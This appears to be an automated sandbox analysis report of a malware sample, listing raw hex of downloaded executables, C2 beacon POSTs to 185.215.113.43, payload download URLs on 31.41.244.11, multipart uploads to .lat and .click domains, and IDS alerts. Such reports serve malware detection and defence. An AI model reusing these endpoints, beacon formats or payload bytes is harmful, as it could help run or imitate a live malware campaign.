64 61 74 61 00 00 24 8b 00 00 00 c0 01 00 00 8c 00 00 00 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 22 00 00 00 50 02 00 00 16 00 00 00 3e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 53 00 00 00 00 53 00 00 00 00 80 02 00 00 02 00 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 02 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 00 00 00 00 a0 02 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 19 00 00 00 b0 02 00 00 1a 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 9c 04 00 00 d0 02 00 00 9c 04 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 9c 04 00 00 70 07 00 00 9c 04 00 00 10 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 18 Dec 2024 10:09:24 GMTContent-Type: application/octet-streamContent-Length: 4438776Last-Modified: Tue, 10 Dec 2024 00:01:52 GMTConnection: keep-aliveETag: "675784f0-43baf8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 4f 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 18 Dec 2024 10:09:45 GMTContent-Type: application/octet-streamContent-Length: 1986048Last-Modified: Wed, 18 Dec 2024 08:56:38 GMTConnection: keep-aliveETag: "67628e46-1e4e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cd d8 9a 7a 89 b9 f4 29 89 b9 f4 29 89 b9 f4 29 c2 c1 f7 28 82 b9 f4 29 c2 c1 f1 28 06 b9 f4 29 c2 c1 f0 28 9d b9 f4 29 9c c6 f1 28 af b9 f4 29 9c c6 f0 28 98 b9 f4 29 9c c6 f7 28 9d b9 f4 29 c2 c1 f5 28 8a b9 f4 29 89 b9 f5 29 da b9 f4 29 89 b9 f4 29 8b b9 f4 29 b3 39 f0 28 8a b9 f4 29 b3 39 0b 29 88 b9 f4 29 b3 39 f6 28 88 b9 f4 29 52 69 63 68 89 b9 f4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 5f 7b 5f 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 25 00 7c 03 00 00 5e 03 00 00 00 01 00 00 b0 4b 00 00 10 00 00 00 90 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4b 00 00 04 00 00 78 e8 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 e0 07 00 6a 00 00 00 00 c0 07 00 6c 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 e1 07 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 07 00 00 10 00 00 00 3c 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 6c 16 00 00 00 c0 07 00 00 08 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 07 00 00 02 00 00 00 54 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 29 00 00 f0 07 00 00 02 00 00 00 56 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 72 71 63 6d 62 66 6b 00 d0 19 00 00 d0 31 00 00 d0 19 00 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 61 78 6f 68 7a 75 74 00 10 00 00 00 a0 4b 00 00 04 00 00 00 28 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4b 00 00 22 00 00 00 2c 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 33 32 41 37 34 42 36 35 44 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB32A74B65D82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: GET /files/dodo/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 38 36 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016868001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 38 36 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016869001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 38 37 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016870001&unit=246122658369
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 33 32 41 37 34 42 36 35 44 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB32A74B65D82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: GET /files/unique3/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 38 37 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016871001&unit=246122658369
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 33 32 41 37 34 42 36 35 44 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB32A74B65D82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                          Source: Joe Sandbox ViewIP Address: 104.21.23.76 104.21.23.76
                          Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49877 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49895 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49894 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49912 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49913 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49919 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49929 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49966 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49959 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49980 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50000 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49971 -> 104.21.23.76:443
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: grannyejh.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: pancakedipyps.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: grannyejh.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: pancakedipyps.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=A5BVGTFOWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12810Host: grannyejh.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ILVZO8LAVB6SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12822Host: pancakedipyps.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NLADBOIZ7F5IUIG50VNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15116Host: grannyejh.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=41IXZLLKRRXJT9RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15086Host: pancakedipyps.click
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBE0C0 recv,recv,recv,recv,0_2_00FBE0C0
                          Source: global trafficHTTP traffic detected: GET /files/dodo/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /files/unique3/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
                          Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
                          Source: global trafficDNS traffic detected: DNS query: pancakedipyps.click
                          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: grannyejh.lat
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010F4000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.0000000001089000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.000000000104B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php1
                          Source: skotes.exe, 00000006.00000002.3384635500.0000000001113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php871001
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpH
                          Source: skotes.exe, 00000006.00000002.3384635500.0000000001113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpUsers
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpY
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpe
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
                          Source: skotes.exe, 00000006.00000002.3384635500.0000000001113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu
                          Source: skotes.exe, 00000006.00000002.3384635500.0000000001089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpr
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php~
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/burpin1/random.exe
                          Source: skotes.exe, 00000006.00000002.3384635500.000000000109F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.0000000001089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/dodo/random.exe
                          Source: skotes.exe, 00000006.00000002.3384635500.000000000109F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/dodo/random.exe%3
                          Source: skotes.exe, 00000006.00000002.3384635500.000000000109F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/dodo/random.exe8476K3
                          Source: skotes.exe, 00000006.00000002.3384635500.0000000001089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/dodo/random.exeN
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/fate/random.exe
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/fate/random.exeA
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique3/random.exe
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique3/random.exe0
